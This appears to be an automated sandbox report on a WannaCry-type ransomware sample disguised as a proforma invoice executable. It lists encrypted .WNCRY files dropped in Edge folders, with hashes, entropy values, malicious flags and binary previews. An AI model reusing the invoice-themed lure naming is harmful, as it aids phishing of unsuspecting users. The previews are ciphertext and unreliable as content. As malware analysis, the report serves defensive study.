                                                          Preview:WANACRY!......$....F[+$...Y...4.6o6..'..~'...Z..3Fg?{..6........O[..YX.6....\....t.N.....WF.+.'..KV...''.d..yk....B(8..)9...W.2Qs....U/g...)K"{..........|......U.....Kn.-....84..c......-.|./b..1.i8.....b.F...{...t.xT.F.......<.....zE~J..07B.PPA....t.;..............S.N...|8(z....D...7..r}2...N...w./......0.f.....S.{$...A(_m..si..Q.b=..xr|Lh^...Ff.?...."..i .s._..Q...b..jg...<.F...>.......]..Y..i..98... ....N.^.-...]..L.O..Pr..X.>.$).2.........x-L._._..}.4.........z..#.W.33++x.[.4.[<...;.....i....w.....BW.6.E......S..x..."m.....:./P..-.=._............W..*.K0.KQ...V..%.W..%z......._r9..!...p.f...J.dG...%.h.}i.6.X>....8..~..&.G..O..a.....6.00..8.iv.V.<..oF..g.ms....3.f.G.n.'..G1..".Ga._g....&U.L..X.......G.O}.^.e.. ...s..e..U.I+.l.......1.....Q....M..wd...d-..\..0...n..@.#.....:f3)T...yB.E.Z.%.%...f.T..kE:.....k.e..+...%.)..%.......n!.Y.v..(..e...o.+7..B.{....].......H...X.2.4..u...Y.c....)f....MY..........(/.....+>9..C).s$F...e]..e.}..&.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80488
                                                          Entropy (8bit):7.997540531943018
                                                          Encrypted:true
                                                          SSDEEP:1536:ilYqBnB2ykuAKh5kBsAnP0s88RFXnmttjxIqRWnUduKiif1ngnAv:ilhBnAd+5klV88PXnE9xwnUFiif1gnAv
                                                          MD5:EAC20B794366F5E1E032A74E72696E11
                                                          SHA1:F99AA84FA541D67DC1868D6B5366C287B5E1DA84
                                                          SHA-256:7B3971B035F9A84FCD887C892BAC258E5001595661064CC10717A73795137FEC
                                                          SHA-512:E4901BDDCC22F5CF30F2F4FBE6F3BE46CD0B779B52CCCB5F7EB4D562B1FF46F5471B061C05D261105D1C6C5C1D59F96228977BB4277AA5B5BE7E59CBCD76B729
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....HE.I.~Q(q..........H..T.....f..L!&D...j#..D...P...d@.!...6.Y........+...x...k.*hC;..<......Q...1.Es"1+.".....:w(.R..../.{r .&g`[/.....k....F._b0Jdi.w...h..M.C.A...`...GN...a....1.1c.......Ds.(k.7.......G[Zb_f.?.G^.j..:...U;I....o .s....B.,.......D9.........c...w...d.......lp..fj.{..7g...K..m..............D.hO.+=....A7.Vo..P7^.*..%...P..@;.Z+...:c.......2...}..s..l8\1a..T. .........<./..Q..MM.3$B.s^.*>3ju>|)nD...#.Sg.u.(..\..oO..C]fo.e.K...x0.....S&\..v.........Z.U..y'...e.%..x}.b3./A.....^x....GAfu.CG8...(.R3WJ.<..8.l9..)aw$.....NK%...h#..O.O.J.7#......(.f.sema..'0k.PZ.....BQ.R....;ag.4.gOV.<.lC*....J.].]..j.....z.1..?.p.#SI%f~.f.H....Is@2..k.^}.Ih<.+{..?.Eb.h....\?.,<M...TM..%a.6*P.&.....,..hr<...+.-w..1.|..DL.w...^t.|...W.k.....]n......e.....j.].lCW.m....U.I.0.3....EK..|<...g..f...*D|S...dj..y..\.4...;Y...wNl(..b&.X.........K.n]....aXjG......K..b.]..<.._...PL-.<.. ..7BlJ.z.7.O..Bi..M@<......i.*.:.|....Q....i0...CnS...@m7....B.B..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80488
                                                          Entropy (8bit):7.997540531943018
                                                          Encrypted:true
                                                          SSDEEP:1536:ilYqBnB2ykuAKh5kBsAnP0s88RFXnmttjxIqRWnUduKiif1ngnAv:ilhBnAd+5klV88PXnE9xwnUFiif1gnAv
                                                          MD5:EAC20B794366F5E1E032A74E72696E11
                                                          SHA1:F99AA84FA541D67DC1868D6B5366C287B5E1DA84
                                                          SHA-256:7B3971B035F9A84FCD887C892BAC258E5001595661064CC10717A73795137FEC
                                                          SHA-512:E4901BDDCC22F5CF30F2F4FBE6F3BE46CD0B779B52CCCB5F7EB4D562B1FF46F5471B061C05D261105D1C6C5C1D59F96228977BB4277AA5B5BE7E59CBCD76B729
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....HE.I.~Q(q..........H..T.....f..L!&D...j#..D...P...d@.!...6.Y........+...x...k.*hC;..<......Q...1.Es"1+.".....:w(.R..../.{r .&g`[/.....k....F._b0Jdi.w...h..M.C.A...`...GN...a....1.1c.......Ds.(k.7.......G[Zb_f.?.G^.j..:...U;I....o .s....B.,.......D9.........c...w...d.......lp..fj.{..7g...K..m..............D.hO.+=....A7.Vo..P7^.*..%...P..@;.Z+...:c.......2...}..s..l8\1a..T. .........<./..Q..MM.3$B.s^.*>3ju>|)nD...#.Sg.u.(..\..oO..C]fo.e.K...x0.....S&\..v.........Z.U..y'...e.%..x}.b3./A.....^x....GAfu.CG8...(.R3WJ.<..8.l9..)aw$.....NK%...h#..O.O.J.7#......(.f.sema..'0k.PZ.....BQ.R....;ag.4.gOV.<.lC*....J.].]..j.....z.1..?.p.#SI%f~.f.H....Is@2..k.^}.Ih<.+{..?.Eb.h....\?.,<M...TM..%a.6*P.&.....,..hr<...+.-w..1.|..DL.w...^t.|...W.k.....]n......e.....j.].lCW.m....U.I.0.3....EK..|<...g..f...*D|S...dj..y..\.4...;Y...wNl(..b&.X.........K.n]....aXjG......K..b.]..<.._...PL-.<.. ..7BlJ.z.7.O..Bi..M@<......i.*.:.|....Q....i0...CnS...@m7....B.B..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11848
                                                          Entropy (8bit):7.982924952610475
                                                          Encrypted:false
                                                          SSDEEP:192:c8pDQctxjA5QvKnO7v3Gz9gtNiNdiQf0syqmO3+ujnMuMBYIvKTs2hLS3t:VQixjA5kKO7fGhgzybssy/m+ujMdK2K+
                                                          MD5:34D6B1AE02CE4E3C16746BE8A776A9FC
                                                          SHA1:DFE11C11181AD9DB74EBF6A23CC9521154430538
                                                          SHA-256:18CEF95332FE400472F5E11ED59675A258940AAA68CF06313FFED9F3268859C7
                                                          SHA-512:FFBCBB337C4CE912F4C683ED711A08824FFD023AC7BE51166A33988BB095CCF15D67373D9BFFBBA189386E6A02498B1CF80FABBE45708D2A18BF4F8A72ACB252
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......$v.g...R..>p...F....h.L.#...`.n.%;..$o...LV%...V.j...B..A/..)..Un.x....'.....n....N....... .P....A...-b.w......0.W..cFx......HP.....fV...A+Q..+.h.y.X..-.K.N..!.......q...r..kA.....Z1^...Gk...sQ.......A..j.o....`.T#3<r..$..aRDX.aU.7G_...........C..../-........f.........-.....E.11\.4.9.H.....-..>....c.%q..9.5.....Q'g.*.1n.q.#v._V..X.M.6..#..I.H..V..t./....@.cHt3...?.D....|uw..U..<..3a0.]T..F~.=...'...|....^d.t...._^.....-]j9.*.9^.s.....3pT.[.R4......!.KsT...._A.W1`.G./....)..7.[.fk../Y.|.f;k.I ..........e>x...G.$.04>.s>C{..j{A.Y@J....T..#...+\..E...1Z.sR...S"..+....je.1...1l....t...5...D......._...2B..>....l...(.Y9a....0.Tq......G|t{.qJ...:.r....S:].D..je..h<...X....w.e..z..*.&.u.......^=.p.u..x 58:....Id....5:..n)V.t.]..B..`.,..y........8J.2..?....4../.A<q.9. G.j...z8.g.9R....@.^....mO.Q.....e..2+.{..V.UA...=k...5x.x......S.fn....].....z..G.ZGk.s..d+.&.o.9.0...Nf.^%es...U8....QD.l...f..........?Q...L..&.Yq.9.~.{g.+0$AkOhEV..7..X..&"

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11848
                                                          Entropy (8bit):7.982924952610475
                                                          Encrypted:false
                                                          SSDEEP:192:c8pDQctxjA5QvKnO7v3Gz9gtNiNdiQf0syqmO3+ujnMuMBYIvKTs2hLS3t:VQixjA5kKO7fGhgzybssy/m+ujMdK2K+
                                                          MD5:34D6B1AE02CE4E3C16746BE8A776A9FC
                                                          SHA1:DFE11C11181AD9DB74EBF6A23CC9521154430538
                                                          SHA-256:18CEF95332FE400472F5E11ED59675A258940AAA68CF06313FFED9F3268859C7
                                                          SHA-512:FFBCBB337C4CE912F4C683ED711A08824FFD023AC7BE51166A33988BB095CCF15D67373D9BFFBBA189386E6A02498B1CF80FABBE45708D2A18BF4F8A72ACB252
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......$v.g...R..>p...F....h.L.#...`.n.%;..$o...LV%...V.j...B..A/..)..Un.x....'.....n....N....... .P....A...-b.w......0.W..cFx......HP.....fV...A+Q..+.h.y.X..-.K.N..!.......q...r..kA.....Z1^...Gk...sQ.......A..j.o....`.T#3<r..$..aRDX.aU.7G_...........C..../-........f.........-.....E.11\.4.9.H.....-..>....c.%q..9.5.....Q'g.*.1n.q.#v._V..X.M.6..#..I.H..V..t./....@.cHt3...?.D....|uw..U..<..3a0.]T..F~.=...'...|....^d.t...._^.....-]j9.*.9^.s.....3pT.[.R4......!.KsT...._A.W1`.G./....)..7.[.fk../Y.|.f;k.I ..........e>x...G.$.04>.s>C{..j{A.Y@J....T..#...+\..E...1Z.sR...S"..+....je.1...1l....t...5...D......._...2B..>....l...(.Y9a....0.Tq......G|t{.qJ...:.r....S:].D..je..h<...X....w.e..z..*.&.u.......^=.p.u..x 58:....Id....5:..n)V.t.]..B..`.,..y........8J.2..?....4../.A<q.9. G.j...z8.g.9R....@.^....mO.Q.....e..2+.{..V.UA...=k...5x.x......S.fn....].....z..G.ZGk.s..d+.&.o.9.0...Nf.^%es...U8....QD.l...f..........?Q...L..&.Yq.9.~.{g.+0$AkOhEV..7..X..&"

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1179240
                                                          Entropy (8bit):7.999839065326081
                                                          Encrypted:true
                                                          SSDEEP:24576:rGb6zKPT5xPjDszDG+bkmt3mjY0q3xb624ia5J:abF9Xfk3mvq3CJ
                                                          MD5:1E39365B2B605B2043B5E0ABB720538B
                                                          SHA1:C3E31F0CB68478A78AFF144A44C1CB33CFD2E23B
                                                          SHA-256:439969BC05A6C33C915B62298389050B08F04AEC441E1DEB6933592A4ACADD49
                                                          SHA-512:4A8F59CC2BC37D25A10AFA456E15D999725E691B9BC144AAA1C76CFCBC691479A7F439763752017D7193FD8A739FEC8FCDDD54AC9C69DAC4564ACA71624100E5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Q.........j./..R..:2w*Y..h.J..ig...%...3..DM.er..L..B}.\...[.wY.H\"T......fq.........eDA<\.GJ......N...:.ZD<..nT.B%z..M..........3Q....&.$.QVx.g.F...i,...?.s..E....|E...p.z.=.{3....jb..|..3f......d...........z.e..P..\...t.<.zT..&......i...0..pCT.;I.h....D.............=.&..K...^...;. .....%;W.o...6.QWj.1.].+.c....GU.w......l.v.1ZW.<A.......R....$.@p..!..M...*..S...C.X.a.H!'WP........rS..yB.Z......'.....W.`I.....0377.]..,..G5.j.......1.c.o..MRn..G2....T.p...A...{.....m.....,h..z..S.'c.....V......c.Ih..T/..$bey...fd......8I....m......*.....=....J...6m..S.zy.K..v.ad.8*..=\.....4!.E.;%h.wn\.<t.3;.|....t.9k&,.Q.._....[...z.Zc......_/`.{..I..$..c.N".V..21]....... ...pH7..j}..Y..N.8...81..}..b....m../...JE.......8^...%..68e....ttx.f.:&.".{..}.[..{.=y.1./....M..na...v d...E%..H..I..F...@..O;.6..DW.;1PY...o.....}.2..........%.......E1...-..U\K.P"M.Dlx....'.,.I.J{..O'...N....=-....#:.h..r"...mI..6).cT?...H.W ....*i.n..;...(..a.z'.5....jE...0.:..k

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1179240
                                                          Entropy (8bit):7.999839065326081
                                                          Encrypted:true
                                                          SSDEEP:24576:rGb6zKPT5xPjDszDG+bkmt3mjY0q3xb624ia5J:abF9Xfk3mvq3CJ
                                                          MD5:1E39365B2B605B2043B5E0ABB720538B
                                                          SHA1:C3E31F0CB68478A78AFF144A44C1CB33CFD2E23B
                                                          SHA-256:439969BC05A6C33C915B62298389050B08F04AEC441E1DEB6933592A4ACADD49
                                                          SHA-512:4A8F59CC2BC37D25A10AFA456E15D999725E691B9BC144AAA1C76CFCBC691479A7F439763752017D7193FD8A739FEC8FCDDD54AC9C69DAC4564ACA71624100E5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Q.........j./..R..:2w*Y..h.J..ig...%...3..DM.er..L..B}.\...[.wY.H\"T......fq.........eDA<\.GJ......N...:.ZD<..nT.B%z..M..........3Q....&.$.QVx.g.F...i,...?.s..E....|E...p.z.=.{3....jb..|..3f......d...........z.e..P..\...t.<.zT..&......i...0..pCT.;I.h....D.............=.&..K...^...;. .....%;W.o...6.QWj.1.].+.c....GU.w......l.v.1ZW.<A.......R....$.@p..!..M...*..S...C.X.a.H!'WP........rS..yB.Z......'.....W.`I.....0377.]..,..G5.j.......1.c.o..MRn..G2....T.p...A...{.....m.....,h..z..S.'c.....V......c.Ih..T/..$bey...fd......8I....m......*.....=....J...6m..S.zy.K..v.ad.8*..=\.....4!.E.;%h.wn\.<t.3;.|....t.9k&,.Q.._....[...z.Zc......_/`.{..I..$..c.N".V..21]....... ...pH7..j}..Y..N.8...81..}..b....m../...JE.......8^...%..68e....ttx.f.:&.".{..}.[..{.=y.1./....M..na...v d...E%..H..I..F...@..O;.6..DW.;1PY...o.....}.2..........%.......E1...-..U\K.P"M.Dlx....'.,.I.J{..O'...N....=-....#:.h..r"...mI..6).cT?...H.W ....*i.n..;...(..a.z'.5....jE...0.:..k

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1010680
                                                          Entropy (8bit):7.999819898825211
                                                          Encrypted:true
                                                          SSDEEP:12288:bTUk+Pusy1jqRo6YPnB4d0LZ7pcdUma3ayil8j6dXm0JWFlFgoG9keHSTtLVN:XN8a664d0LZ7SJa3ol8OnWFTg79ZSTt
                                                          MD5:C45CB44580550F76EAB603B68EAB8338
                                                          SHA1:EB143E03B1B3F462925BEC34E6ED6F2590F4097D
                                                          SHA-256:0AD3F7C626CEABC2FC9F31D8DABBB7FE9C72CC79F0736E2CE563733E6BFFED22
                                                          SHA-512:EA2C43512B9DA5A0413FF5B75998FF59A0C4C24B363542D000F6D1E1E6E2803935A2B7C647F46F2E933A713A4DAF1F4C754821DAC2B6A4D6598F3C99A8A110B0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....%..-.....m!.a.......Y.m..[..L.....P.V..x]..RC.;....1.&.A......9.W.,....e..j.....#S.qQ$}n......|b..o'D:.h.{.W..(A?..J..........ZUU|q.....A...Kp.c8.g.7.L....%........9...z.k._..6.p......}...v.^)F....1..X'..L..R@k...q-..P&.D....5u)|..\B..^...^......j.......)......-z#..ry.e..........V..Z..h...i;U.-T.O.J<.-..?.......q..M..D.`.xg.\.%E....v`$.-.yt<..M.s.."\.K....).w....[.Qs\....).u..K.b....PF*F.{..u..k..{.2pM...t-t.x...V...+.N.=....=g.F .A"....:...,........E.f.j.w.v../@e.2..+6b..uCl1t.PM._}N.......q.....@..I-.WE..|t..>..a.~..$.1..i.-..;.7P-P.H....dl.C...f....X.c...c.....i.\.wTqJ.....}=.e_..%3(...'~..|..F..i.... ....:.]A.$..u..O..nh......)Z.QUO9.4p...".[.....E.Z.M.[_*k'.R_=4.D...\...f...gH#... .byUQ..L4......Jj.S.<...x..#.!...w.......1..Wh~-S..(.S...L.8.n[."..].Y4...7.sg..|.U.....&...e..gX|$}..J.......I.Z.t..:.^?.S.>=..(....."...%..2..Xd....D..uP...!..xt............Z.....@....k..D..C9..CCgnh......a.Z.#.G.q.El...;..6W...E7.F_.;c:.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1010680
                                                          Entropy (8bit):7.999819898825211
                                                          Encrypted:true
                                                          SSDEEP:12288:bTUk+Pusy1jqRo6YPnB4d0LZ7pcdUma3ayil8j6dXm0JWFlFgoG9keHSTtLVN:XN8a664d0LZ7SJa3ol8OnWFTg79ZSTt
                                                          MD5:C45CB44580550F76EAB603B68EAB8338
                                                          SHA1:EB143E03B1B3F462925BEC34E6ED6F2590F4097D
                                                          SHA-256:0AD3F7C626CEABC2FC9F31D8DABBB7FE9C72CC79F0736E2CE563733E6BFFED22
                                                          SHA-512:EA2C43512B9DA5A0413FF5B75998FF59A0C4C24B363542D000F6D1E1E6E2803935A2B7C647F46F2E933A713A4DAF1F4C754821DAC2B6A4D6598F3C99A8A110B0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....%..-.....m!.a.......Y.m..[..L.....P.V..x]..RC.;....1.&.A......9.W.,....e..j.....#S.qQ$}n......|b..o'D:.h.{.W..(A?..J..........ZUU|q.....A...Kp.c8.g.7.L....%........9...z.k._..6.p......}...v.^)F....1..X'..L..R@k...q-..P&.D....5u)|..\B..^...^......j.......)......-z#..ry.e..........V..Z..h...i;U.-T.O.J<.-..?.......q..M..D.`.xg.\.%E....v`$.-.yt<..M.s.."\.K....).w....[.Qs\....).u..K.b....PF*F.{..u..k..{.2pM...t-t.x...V...+.N.=....=g.F .A"....:...,........E.f.j.w.v../@e.2..+6b..uCl1t.PM._}N.......q.....@..I-.WE..|t..>..a.~..$.1..i.-..;.7P-P.H....dl.C...f....X.c...c.....i.\.wTqJ.....}=.e_..%3(...'~..|..F..i.... ....:.]A.$..u..O..nh......)Z.QUO9.4p...".[.....E.Z.M.[_*k'.R_=4.D...\...f...gH#... .byUQ..L4......Jj.S.<...x..#.!...w.......1..Wh~-S..(.S...L.8.n[."..].Y4...7.sg..|.U.....&...e..gX|$}..J.......I.Z.t..:.^?.S.>=..(....."...%..2..Xd....D..uP...!..xt............Z.....@....k..D..C9..CCgnh......a.Z.#.G.q.El...;..6W...E7.F_.;c:.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1042184
                                                          Entropy (8bit):7.999804880191285
                                                          Encrypted:true
                                                          SSDEEP:24576:Y+7V5ZwwZAN2zSyyBYkLXqhgePw/MJXTSg:Y+RTw4w2zSyyBn6o4TSg
                                                          MD5:81140A11992DC6D0167CECD7C81F01B5
                                                          SHA1:7581D03AA5D084790F1A9392483FF363983913D5
                                                          SHA-256:0C0EBC8659A0BEC6534CD826AB6B5738AD4D60664F0DCC6F7DC78B8F511E77E6
                                                          SHA-512:D128A3B841D5A3CAEA50563B0C11886D3338F436D6C706E0E0C2A8230093B622A585252507438827937E82E17B296AD77B133E68B74CCCB970A98BCA3D137E7A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......s.U ...6(.....&.Z.........yc$}'6T...*..P["_d.a:..?.C.]o...Q.....cj...-...4.....X..B.]..Q...7.^p....t...7..Tt|u.3.Y..T..$w....R6...O....gw<..1..jxZ\....sx.|@8....M....7_.@......+...T.]...j$!#p...yg7\.....h.....k...>G+b.M?D....G?S[...w$w..\.................l.m._..........m..e..R.5.....C....S.1..uI4..y....^,...<.....Q0!....HB.#P.O.wYsL..=.r.l.1.....^=7..a..&,j'.^....`7.:....]...tA....n.?[_j.I..(E.J..%F>.hD._P.*`...ng.O\rA.Y.1.a...........9._k..9...FF...K..b..Z.$5_6...n.@i..N.6..Yp..Z.c..^.....o....t....a:..7............._R......?^..^wT.Q...=R.n..z.y..<^n.."U=2<.N.t..6@2.=.]..O.....K*.<............r`..D..3#.@....v...g.`..z.,.lQ.?...O.|..$.D..Owf.`..R..Wj%..r.yG...N.....@....c.-.E..V2..X....4.J....R..z.=.)...u..G.h...30..".qx'.2Z.$. e.e......j.m...c.......9B......O.GJ........A....H.......7.C=l.N|[B./...gyeG5...V.T...G.~.6..pn.S.._....-B.rM\+GD.T.........[.?[...>7.c.d.....Q.d..6V>.(..Z..IZ.......~..b..u.E$.6a..4R.........D...q

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1042184
                                                          Entropy (8bit):7.999804880191285
                                                          Encrypted:true
                                                          SSDEEP:24576:Y+7V5ZwwZAN2zSyyBYkLXqhgePw/MJXTSg:Y+RTw4w2zSyyBn6o4TSg
                                                          MD5:81140A11992DC6D0167CECD7C81F01B5
                                                          SHA1:7581D03AA5D084790F1A9392483FF363983913D5
                                                          SHA-256:0C0EBC8659A0BEC6534CD826AB6B5738AD4D60664F0DCC6F7DC78B8F511E77E6
                                                          SHA-512:D128A3B841D5A3CAEA50563B0C11886D3338F436D6C706E0E0C2A8230093B622A585252507438827937E82E17B296AD77B133E68B74CCCB970A98BCA3D137E7A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......s.U ...6(.....&.Z.........yc$}'6T...*..P["_d.a:..?.C.]o...Q.....cj...-...4.....X..B.]..Q...7.^p....t...7..Tt|u.3.Y..T..$w....R6...O....gw<..1..jxZ\....sx.|@8....M....7_.@......+...T.]...j$!#p...yg7\.....h.....k...>G+b.M?D....G?S[...w$w..\.................l.m._..........m..e..R.5.....C....S.1..uI4..y....^,...<.....Q0!....HB.#P.O.wYsL..=.r.l.1.....^=7..a..&,j'.^....`7.:....]...tA....n.?[_j.I..(E.J..%F>.hD._P.*`...ng.O\rA.Y.1.a...........9._k..9...FF...K..b..Z.$5_6...n.@i..N.6..Yp..Z.c..^.....o....t....a:..7............._R......?^..^wT.Q...=R.n..z.y..<^n.."U=2<.N.t..6@2.=.]..O.....K*.<............r`..D..3#.@....v...g.`..z.,.lQ.?...O.|..$.D..Owf.`..R..Wj%..r.yG...N.....@....c.-.E..V2..X....4.J....R..z.=.)...u..G.h...30..".qx'.2Z.$. e.e......j.m...c.......9B......O.GJ........A....H.......7.C=l.N|[B./...gyeG5...V.T...G.~.6..pn.S.._....-B.rM\+GD.T.........[.?[...>7.c.d.....Q.d..6V>.(..Z..IZ.......~..b..u.E$.6a..4R.........D...q

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1681000
                                                          Entropy (8bit):7.9998856937145915
                                                          Encrypted:true
                                                          SSDEEP:49152:X9DW9bi8KQhYjmExjYXVYmfgGotgWM4AODBpd:X18KOemEdIV9gGpWM5OFX
                                                          MD5:70CA6C933AA6C2829080874211126BD9
                                                          SHA1:47CAE691130DEE1D9616EB59C9F3A3FC30EDF715
                                                          SHA-256:C2728396B2604B5686FA5C42A9A1178D11A31454F12096B9EDFA30F3A73E1CBF
                                                          SHA-512:6CF19DE6C98A22DF49686CF5AF8321FA1C0D71DDBA2B5703D48A457DAA4A4CC9D641DD3CCD1B50FD03DBF66770DBCF9525F686F74AE9E72D1A93D1BF41710C2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......3.... WS...8*..5.U....L.6.7}N........d..5.u.h.....J.xs@z........o.....@.4t.0.le................2..G.........3\...ug....].....p>...2.EP..n...Va{o....P.t..W......?...'.S.,7.}...\.+.f[..j..'.+.2_.* m%.:-.e.p&Y(.q.K.0'..YV..Vv.u........_/..G..:)..tq....K.........C.i+.i Y..U'.O.$.Gy.......'.dY,...9...c..~.....).n ....p'.S..r:h....]...n.F..P?..}.9...ADoYx....e.b..QZj..oq.....'..cw.....kfF.7e2.?.}..v....`...Y.~};..B.6..k+...h#.l.d..RBO%...&t...;..^.F...;.cS....F.,....d.o.....{.O..IyC./.>4.M....3..X..Nh..{/e........q._?...c..hKg.`...'m.NAx...n.a.}L.;.'..6.F.......GS...4X.u..;|...y`...Q..g5Q-.xZ...~%L.(.>..%Z.q..z..h~.K......c.:_m....2F.=.la..>.Q.....Sg...RE...X../.<..8..,..^.C6....!...c./.~~....>.3.Z.M.......l3..*l..'.8.........4...5..h..X....0#.....|...N....xR...T0....b...z.&_..5.R....L......;...f.4}E*2V....^.......Z....=.0.H..,.N....F.;..R.R`oP..r..;.............z.o......|...M...S."x...6*.F..... .m..r....L&=0..$I.!:.....a`^..|c..6}gp$...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1681000
                                                          Entropy (8bit):7.9998856937145915
                                                          Encrypted:true
                                                          SSDEEP:49152:X9DW9bi8KQhYjmExjYXVYmfgGotgWM4AODBpd:X18KOemEdIV9gGpWM5OFX
                                                          MD5:70CA6C933AA6C2829080874211126BD9
                                                          SHA1:47CAE691130DEE1D9616EB59C9F3A3FC30EDF715
                                                          SHA-256:C2728396B2604B5686FA5C42A9A1178D11A31454F12096B9EDFA30F3A73E1CBF
                                                          SHA-512:6CF19DE6C98A22DF49686CF5AF8321FA1C0D71DDBA2B5703D48A457DAA4A4CC9D641DD3CCD1B50FD03DBF66770DBCF9525F686F74AE9E72D1A93D1BF41710C2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......3.... WS...8*..5.U....L.6.7}N........d..5.u.h.....J.xs@z........o.....@.4t.0.le................2..G.........3\...ug....].....p>...2.EP..n...Va{o....P.t..W......?...'.S.,7.}...\.+.f[..j..'.+.2_.* m%.:-.e.p&Y(.q.K.0'..YV..Vv.u........_/..G..:)..tq....K.........C.i+.i Y..U'.O.$.Gy.......'.dY,...9...c..~.....).n ....p'.S..r:h....]...n.F..P?..}.9...ADoYx....e.b..QZj..oq.....'..cw.....kfF.7e2.?.}..v....`...Y.~};..B.6..k+...h#.l.d..RBO%...&t...;..^.F...;.cS....F.,....d.o.....{.O..IyC./.>4.M....3..X..Nh..{/e........q._?...c..hKg.`...'m.NAx...n.a.}L.;.'..6.F.......GS...4X.u..;|...y`...Q..g5Q-.xZ...~%L.(.>..%Z.q..z..h~.K......c.:_m....2F.=.la..>.Q.....Sg...RE...X../.<..8..,..^.C6....!...c./.~~....>.3.Z.M.......l3..*l..'.8.........4...5..h..X....0#.....|...N....xR...T0....b...z.&_..5.R....L......;...f.4}E*2V....^.......Z....=.0.H..,.N....F.;..R.R`oP..r..;.............z.o......|...M...S."x...6*.F..... .m..r....L&=0..$I.!:.....a`^..|c..6}gp$...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80072
                                                          Entropy (8bit):7.997578833851237
                                                          Encrypted:true
                                                          SSDEEP:1536:CoV74f8veOI/Go21dTzBXVrM11MI3edMAI70DTkJNfCWjXK3DdYh84LIrd:KGo+XVw11F3edMKgVu3DdYh8kKd
                                                          MD5:795F96BF5A069F3CD1A1CB7707F3678C
                                                          SHA1:9B150A586F2A6BFCA9F6765974753E2E5D5D6B47
                                                          SHA-256:AFBD1B176ECB8DE7C7E4A1863E644E32AC4410230E15A0AC4C61DE3924E82403
